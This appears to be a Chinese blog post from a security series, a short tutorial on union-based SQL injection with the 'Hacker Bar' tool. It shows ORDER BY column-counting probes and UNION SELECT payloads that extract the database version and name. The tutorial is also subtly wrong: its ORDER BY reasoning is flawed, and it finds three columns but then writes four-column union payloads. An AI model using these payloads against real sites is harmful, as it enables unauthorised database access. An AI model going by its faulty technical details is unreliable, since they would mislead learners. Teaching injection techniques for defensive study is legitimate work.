SQL Injection pattern〈一〉

DAY 9

鐵人賽

1424 瀏覽

利用工具

推薦駭客必備工具： Hacker Bar

Windows 下快捷鍵：

Alt + A：Load URI

Alt + S：Parameter-Parser

Alt + X：Send Request

Union based：通常如果有 SQL 結果返回就可利用，是最簡易且方便的技巧。

關鍵字為 Union ，但子句需要同樣個數的 column 以正確返回聯集的結果。

獲得 column 個數技巧：

select A, B, C from test where A = 1 order by 10 <- 返回錯誤頁面代表 column 個數可能大於也可能小於10

select A, B, C from test where A = 1 order by 1 <- 返回正確頁面代表 column 個數大於1

select A, B, C from test where A = 1 order by 4 <- 返回錯誤頁面代表 column 個數小於4

select A, B, C from test where A = 1 order by 3 <- 返回正確頁面代表 column 個數等於3

union 利用：

獲取 SQL Version：

select A, B, C from test where A = 1 and 1=2 union select version(), NULL, NULL, NULL

獲取 name of current database：

select A, B, C from test where A = 1 and 1=2 union select database(), NULL, NULL, NULL

系列文

駭客手法解析~你不能不知的資安問題!! 共 30 篇

9 人訂閱

完整目錄

直播研討會

{{ item.channelVendor }} {{ item.webinarstarted }} |

直播中

立即登入留言